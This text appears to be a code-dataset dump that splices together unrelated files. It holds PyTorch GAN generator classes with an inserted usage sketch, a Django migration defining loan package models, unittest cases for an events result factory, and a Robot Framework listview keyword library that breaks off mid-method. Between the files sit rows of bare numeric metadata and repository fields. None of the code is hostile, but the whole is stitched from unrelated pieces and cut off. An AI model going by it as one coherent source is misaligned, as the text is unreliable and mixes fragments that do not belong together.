        self.bn4 = nn.BatchNorm2d(64)
        self.l6 = nn.Sequential(
            nn.LeakyReLU(0.2),
            nn.Conv2d(64, 3, kernel_size=5, padding=2, stride=1),
            nn.Tanh())

    def forward(self, z, step=0):
        print("no extra noise in decoder")
        out = self.l1(z)
        out = out.view(self.batch_size, 512, 4, 4)
        out = self.l2(out)
        h2 = self.bn1(out)
        out = self.l3(h2)
        h3 = self.bn2(out)
        h4l = self.l4(h3)
        h4 = self.bn3(h4l)
        h5l = self.l5(h4)
        out = self.bn4(h5l)
        out = self.l6(out)
        print("gen size", out.size())
        # also returns the pre-batchnorm activations of l4 as a feature map
        return out, h4l


# Returns 96x128
# 3x4 -> 6x8 -> 12x16 -> 24x32 -> 48x64 -> 96x128
class Generator_ConvDuck(nn.Module):
    def __init__(self, batch_size, nz):
        super(Generator_ConvDuck, self).__init__()
        self.batch_size = batch_size
        self.nz = nz
        self.l1 = nn.Sequential(
            nn.Linear(nz * 2, 512 * 3 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(256, affine=True),
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128, affine=True),
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128, affine=True),
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128, affine=True),
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(64, affine=True),
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32, affine=True),
            nn.LeakyReLU(0.2),
            nn.Conv2d(32, 3, kernel_size=5, padding=2, stride=1),
            nn.Tanh())

    def forward(self, z):
        print("no extra noise in decoder")
        # z_extra is scaled by 0.0, so the concatenated extra noise is effectively disabled
        z_extra = 0.0 * to_var(torch.randn(self.batch_size, self.nz))
        out = self.l1(torch.cat((z, z_extra), 1))
        out = out.view(self.batch_size, 512, 3, 4)
        out = self.l2(out)
        return out


class Gen_Bot_Conv32(nn.Module):
    def __init__(self, batch_size, nz):
        super(Gen_Bot_Conv32, self).__init__()
        self.batch_size = batch_size
        self.l1 = nn.Sequential(
            nn.Linear(nz, 512 * 4 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(256),
            nn.UpsamplingBilinear2d(scale_factor=2),
            nn.LeakyReLU(0.02),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128),
            nn.LeakyReLU(0.02),
            nn.UpsamplingBilinear2d(scale_factor=2),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(64),
            nn.LeakyReLU(0.02),
            nn.UpsamplingBilinear2d(scale_factor=2),
            nn.Conv2d(64, 3, kernel_size=5, padding=2, stride=1),
            nn.Tanh())

    def forward(self, z, give_pre=False):
        # give_pre=True skips the linear projection and treats z as the pre-conv feature map
        if give_pre:
            out = z
        else:
            out = self.l1(z)
        out = out.view(self.batch_size, 512, 4, 4)
        out = self.l2(out)
        return out


class Gen_Bot_Conv32_deep1(nn.Module):
    def __init__(self, batch_size, nz):
        super(Gen_Bot_Conv32_deep1, self).__init__()
        self.batch_size = batch_size
        self.l1 = nn.Sequential(
            nn.Linear(nz, 512 * 4 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128),
            nn.LeakyReLU(0.02),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(64),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Conv2d(32, 3, kernel_size=1, padding=0, stride=1),
            nn.Tanh())

    def forward(self, z, give_pre=False):
        if give_pre:
            out = z
        else:
            out = self.l1(z)
        out = out.view(self.batch_size, 512, 4, 4)
        out = self.l2(out)
        return out


class Gen_Bot_Conv32_deepbottleneck(nn.Module):
    def __init__(self, batch_size, nz):
        super(Gen_Bot_Conv32_deepbottleneck, self).__init__()
        self.batch_size = batch_size
        self.l1 = nn.Sequential(
            nn.Linear(nz, 32 * 4 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(32, 256, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128),
            nn.LeakyReLU(0.02),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(64),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Conv2d(32, 3, kernel_size=1, padding=0, stride=1),
            nn.Tanh())

    def forward(self, z, give_pre=False):
        if give_pre:
            out = z
        else:
            out = self.l1(z)
        out = out.view(self.batch_size, 32, 4, 4)
        out = self.l2(out)
        return out


class Gen_Bot_Joint(nn.Module):
    def __init__(self, batch_size, nz):
        super(Gen_Bot_Joint, self).__init__()
        self.batch_size = batch_size
        self.l1 = nn.Sequential(
            nn.Linear(nz, 32 * 4 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(32, 256, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(128),
            nn.LeakyReLU(0.02),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(64),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
            nn.BatchNorm2d(32),
            nn.LeakyReLU(0.02),
            # 3*5 output channels: five 3-channel images predicted jointly
            nn.Conv2d(32, 3 * 5, kernel_size=1, padding=0, stride=1),
            nn.Tanh())

    def forward(self, z):
        out = self.l1(z)
        out = out.view(self.batch_size, 32, 4, 4)
        out = self.l2(out)
        return out
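As a quick shape sanity check for the classes above, here is a small usage sketch; the batch size and latent dimension are illustrative values, and it assumes a PyTorch version recent enough that tensors can be fed directly without wrapping in Variable.

import torch

batch_size, nz = 16, 100
gen = Gen_Bot_Conv32(batch_size, nz)
z = torch.randn(batch_size, nz)     # latent codes
with torch.no_grad():
    x = gen(z)                      # 4x4 -> 8x8 -> 16x16 -> 32x32 (three bilinear upsamplings)
print(x.shape)                      # expected: torch.Size([16, 3, 32, 32])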
| 33.470588
| 69
| 0.547193
| 1,333
| 9,673
| 3.83871
| 0.08027
| 0.057846
| 0.077389
| 0.109048
| 0.869064
| 0.865351
| 0.839554
| 0.824897
| 0.817471
| 0.809068
| 0
| 0.110237
| 0.316344
| 9,673
| 288
| 70
| 33.586806
| 0.663542
| 0.006306
| 0
| 0.767347
| 0
| 0
| 0.006038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02449
| null | null | 0.012245
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9bdd0aaaeaca32d36ec1b1d239c475fa324cceb3
| 3,209
|
py
|
Python
|
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
# Generated by Django 3.0.2 on 2020-05-17 17:05

import accounts.models
import cloudinary.models
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='LoanCalculators',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=300, null=True)),
                ('price', models.IntegerField(default=3000)),
                ('premium_package', models.BooleanField(default=True)),
                ('package_owner', models.CharField(max_length=300)),
                ('description', models.TextField()),
                ('file', models.CharField(blank=True, help_text='download link here!', max_length=300, null=True)),
                ('product_code', models.CharField(blank=True, max_length=10, null=True)),
                ('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='LoanCollectionPackage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=300, null=True)),
                ('price', models.IntegerField(default=3000)),
                ('premium_package', models.BooleanField(default=True)),
                ('package_owner', models.CharField(max_length=300)),
                ('description', models.TextField()),
                ('product_code', models.CharField(blank=True, max_length=10, null=True)),
                ('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='LoanPackage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=300, null=True)),
                ('price', models.IntegerField(default=3000)),
                ('premium_package', models.BooleanField(default=True)),
                ('package_owner', models.CharField(max_length=300)),
                ('description', models.TextField()),
                ('product_code', models.CharField(blank=True, max_length=10, null=True)),
                ('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
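For orientation, the CreateModel operations above are what Django's makemigrations would emit for models roughly like the sketch below. This is reverse-engineered from the migration, not the repository's actual models.py: Meta options are omitted, LoanCollectionPackage and LoanPackage are identical to LoanCalculators minus the file field, and passing upload_image_path as the field's first positional argument mirrors the migration literally, since Django records that argument as verbose_name (the upload-path callable was likely intended for a different parameter).

from cloudinary.models import CloudinaryField
from django.db import models

from accounts.models import upload_image_path  # helper referenced by the migration


class LoanCalculators(models.Model):
    name = models.CharField(blank=True, max_length=300, null=True)
    price = models.IntegerField(default=3000)
    premium_package = models.BooleanField(default=True)
    package_owner = models.CharField(max_length=300)
    description = models.TextField()
    file = models.CharField(blank=True, help_text='download link here!', max_length=300, null=True)
    product_code = models.CharField(blank=True, max_length=10, null=True)
    # first positional arg becomes verbose_name in the generated migration
    image = CloudinaryField(upload_image_path, blank=True, max_length=255, null=True)
    timestamp = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)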
| 50.936508
| 148
| 0.604861
| 323
| 3,209
| 5.854489
| 0.226006
| 0.061872
| 0.057113
| 0.085669
| 0.841354
| 0.830777
| 0.830777
| 0.830777
| 0.830777
| 0.830777
| 0
| 0.026371
| 0.255531
| 3,209
| 62
| 149
| 51.758065
| 0.765174
| 0.014023
| 0
| 0.763636
| 1
| 0
| 0.102783
| 0.006641
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.054545
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5018dc69bc33f2a63403c8af95e1810a9cc305cb
| 4,980
|
py
|
Python
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | 1
|
2021-08-23T01:33:03.000Z
|
2021-08-23T01:33:03.000Z
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | 20
|
2019-10-29T10:55:27.000Z
|
2022-03-12T00:04:50.000Z
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from src.t1000.application.dependency_injection.result_factory import EventsResultFactory
class EventsResultFactoryTestCase(unittest.TestCase):
def setUp(self):
return super().setUp()
def tearDown(self):
return super().tearDown()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_resource_exception(self, resource_mock, command_mock, console_mock, html_mock):
resource_mock.create.side_effect = Exception('Raise exception')
with self.assertRaises(Exception) as e:
EventsResultFactory.create('exception', 'exception', 'exception', 'exception', 'exception')
self.assertEqual(str(e.exception), 'Raise exception')
resource_mock.create.assert_called_once_with('exception')
command_mock.create.assert_not_called()
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_command_exception(self, resource_mock, command_mock, console_mock, html_mock):
command_mock.create.side_effect = Exception('Raise exception')
with self.assertRaises(Exception) as e:
EventsResultFactory.create('exception', 'events_detail', 'exception', 'Events', 'in_memory')
self.assertEqual(str(e.exception), 'Raise exception')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='exception', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_exception(self, resource_mock, command_mock, console_mock, html_mock):
with self.assertRaises(Exception) as e:
EventsResultFactory.create('exception', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
self.assertEqual(str(e.exception), 'Result type exception does not supported')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_cmd(self, resource_mock, command_mock, console_mock, html_mock):
EventsResultFactory.create('cmd', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_called_once()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_html(self, resource_mock, command_mock, console_mock, html_mock):
EventsResultFactory.create('html', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_called_once()
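The factory under test is not shown in this file, but the assertions above pin down its observable behaviour: the resource is built first, then the command, and only then is the result type dispatched. A minimal sketch consistent with those assertions follows; the constructor arguments handed to ConsoleEventsResult/HtmlEventsResult are a guess, since the tests only check that each class is called once.
from src.t1000.application.dependency_injection.result_factory import (
    EventsResourceFactory, EventsCommandFactory, ConsoleEventsResult, HtmlEventsResult)

class EventsResultFactorySketch:
    """Hypothetical reconstruction of EventsResultFactory inferred from the tests above."""
    @staticmethod
    def create(result_type, resource_name, use_case, entity, persistence_type):
        # Resource is created first: a failure here must propagate before anything else.
        resource = EventsResourceFactory.create(resource_name)
        # Command creation uses exactly the keyword arguments asserted in the tests.
        command = EventsCommandFactory.create(use_case=use_case, entity=entity,
                                              persistence_type=persistence_type)
        if result_type == 'cmd':
            return ConsoleEventsResult(resource, command)
        if result_type == 'html':
            return HtmlEventsResult(resource, command)
        # Message template matches the string asserted in test_create_with_exception.
        raise Exception('Result type {} does not supported'.format(result_type))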
| 63.037975
| 132
| 0.781124
| 567
| 4,980
| 6.522046
| 0.10582
| 0.04543
| 0.107896
| 0.164684
| 0.898864
| 0.898864
| 0.898864
| 0.885073
| 0.873716
| 0.865062
| 0
| 0.019039
| 0.114056
| 4,980
| 78
| 133
| 63.846154
| 0.81913
| 0
| 0
| 0.606061
| 0
| 0
| 0.419076
| 0.334538
| 0
| 0
| 0
| 0
| 0.393939
| 1
| 0.106061
| false
| 0
| 0.045455
| 0.030303
| 0.19697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5037b65828494312ee14b10d82972d43bcdec323
| 17,387
|
py
|
Python
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 54
|
2016-10-13T23:48:12.000Z
|
2022-03-04T03:35:34.000Z
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 95
|
2016-09-11T18:43:31.000Z
|
2021-02-25T18:04:03.000Z
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 19
|
2017-04-20T09:40:48.000Z
|
2022-02-25T18:52:37.000Z
|
from TestStack.White.UIItems import ListView
from WhiteLibrary.keywords.librarycomponent import LibraryComponent
from WhiteLibrary.keywords.robotlibcore import keyword
from WhiteLibrary.utils.click import Clicks
class ListViewKeywords(LibraryComponent):
@keyword
def double_click_listview_cell(self, locator, column_name, row_index, x_offset=0, y_offset=0):
"""Double clicks a listview cell.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``column_name`` is the name of the column.
``row_index`` is the zero-based row index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Cell | id:addressList | Street | 0 | # double click cell in the column "Street" of the first row |
"""
cell = self._get_cell(locator, column_name, row_index)
Clicks.double_click(cell, x_offset, y_offset)
@keyword
def double_click_listview_cell_by_index(self, locator, row_index, column_index, x_offset=0, y_offset=0):
"""Double clicks a listview cell at index.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``row_index`` is the zero-based row index.
``column_index`` is the zero-based column index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Cell By Index | id:addressList | 0 | 0 |
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
Clicks.double_click(cell, x_offset, y_offset)
@keyword
def double_click_listview_row(self, locator, column_name, cell_text, x_offset=0, y_offset=0):
"""Double clicks a listview row.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``column_name`` and ``cell_text`` define the row. Row is the first matching row where text in column
``column_name`` is ``cell_text``.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row | id:addressList | City | Helsinki | # double click row that has the text "Helsinki" in the column "City" |
"""
row = self._get_row(locator, column_name, cell_text)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def double_click_listview_row_by_index(self, locator, row_index, x_offset=0, y_offset=0):
"""Double clicks a listview row at index.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``row_index`` is the zero-based row index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row By Index | id:addressList | 4 |
"""
row = self._get_row_by_index(locator, row_index)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def double_click_listview_row_by_text(self, locator, text, x_offset=0, y_offset=0):
"""Double clicks a listview row with matching text.
``locator`` is the locator of the listview or the ListView item object.
Locator syntax is explained in `Item locators`.
``text`` is the exact text of the row. If there are multiple cells on the row, the text will be matched
against the first cell.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row By Text | id:cities | Berlin |
"""
row = self._get_row_by_text(locator, text)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def get_listview_cell_text(self, locator, column_name, row_index):
"""Returns text of a listview cell.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
return cell.Text
@keyword
def get_listview_cell_text_by_index(self, locator, row_index, column_index):
"""Returns text of a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
return cell.Text
@keyword
def get_listview_row_text(self, locator, column_name, cell_text):
"""Returns a list containing text of each cell in a listview row.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
return [cell.Text for cell in row.Cells]
@keyword
def get_listview_row_text_by_index(self, locator, row_index):
"""Returns text of a listview row as a list.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
return [cell.Text for cell in row.Cells]
@keyword
def listview_cell_at_index_should_contain(self, locator, row_index, column_index, expected):
"""Verifies that the given listview cell contains text ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if expected not in cell.Text:
raise AssertionError(u"Cell ({}, {}) did not contain text '{}'".format(row_index, column_index, expected))
@keyword
def listview_cell_at_index_should_not_contain(self, locator, row_index, column_index, expected):
"""Verifies that the given listview cell does not contain text ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if expected in cell.Text:
raise AssertionError(
u"Cell ({}, {}) should not have contained text '{}'".format(row_index, column_index, expected)
)
@keyword
def listview_cell_should_contain(self, locator, column_name, row_index, expected):
"""Verifies that the given listview cell contains text ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if expected not in cell.Text:
raise AssertionError(u"Cell did not contain text '{}'".format(expected))
@keyword
def listview_cell_should_not_contain(self, locator, column_name, row_index, expected):
"""Verifies that the given listview cell does not contain text ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if expected in cell.Text:
raise AssertionError(u"Cell should not have contained text '{}'".format(expected))
@keyword
def listview_cell_text_at_index_should_be(self, locator, row_index, column_index, expected):
"""Verifies that listview cell text is ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if cell.Text != expected:
raise AssertionError(
u"Cell ({}, {}) text should have been '{}', found '{}'".format(
row_index, column_index, expected, cell.Text
)
)
@keyword
def listview_cell_text_at_index_should_not_be(self, locator, row_index, column_index, expected):
"""Verifies that listview cell text is not ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if cell.Text == expected:
raise AssertionError(
u"Cell ({}, {}) text should not have been '{}'".format(row_index, column_index, expected)
)
@keyword
def listview_cell_text_should_be(self, locator, column_name, row_index, expected):
"""Verifies that listview cell text is ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if cell.Text != expected:
raise AssertionError(u"Cell text should have been '{}', found '{}'".format(expected, cell.Text))
@keyword
def listview_cell_text_should_not_be(self, locator, column_name, row_index, expected):
"""Verifies that listview cell text is not ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if cell.Text == expected:
raise AssertionError(u"Cell text should not have been '{}'".format(expected))
@keyword
def listview_row_at_index_should_contain(self, locator, row_index, expected):
"""Verifies that any cell in the given listview row contains text ``expected``.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
for cell in row.Cells:
if expected in cell.Text:
return
raise AssertionError(u"Row {} did not contain text '{}'".format(row_index, expected))
@keyword
def listview_row_at_index_should_not_contain(self, locator, row_index, expected):
"""Verifies that any cell in the given listview row does not contain text ``expected``.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
row = listview.Rows.Get(int(row_index))
for cell in row.Cells:
if expected in cell.Text:
raise AssertionError(u"Row {} should not have contained text '{}'".format(row_index, expected))
@keyword
def listview_row_should_contain(self, locator, column_name, cell_text, expected):
"""Verifies that the given listview row contains text ``expected``.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
for cell in row.Cells:
if expected in cell.Text:
return
raise AssertionError(
u"Row defined by cell '{}'='{}' did not contain text '{}'".format(column_name, cell_text, expected)
)
@keyword
def listview_row_should_not_contain(self, locator, column_name, cell_text, expected):
"""Verifies that the given listview row does not contain text ``expected``.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
for cell in row.Cells:
if expected in cell.Text:
raise AssertionError(
u"Row defined by cell '{}'='{}' should not have contained text '{}'".format(
column_name, cell_text, expected
)
)
@keyword
def right_click_listview_cell(self, locator, column_name, row_index, x_offset=0, y_offset=0):
"""Right clicks a listview cell using its column name and row index.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
Clicks.right_click(cell, x_offset, y_offset)
@keyword
def right_click_listview_cell_by_index(self, locator, row_index, column_index, x_offset=0, y_offset=0):
"""Right clicks a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
Clicks.right_click(cell, x_offset, y_offset)
@keyword
def right_click_listview_row(self, locator, column_name, cell_text, x_offset=0, y_offset=0):
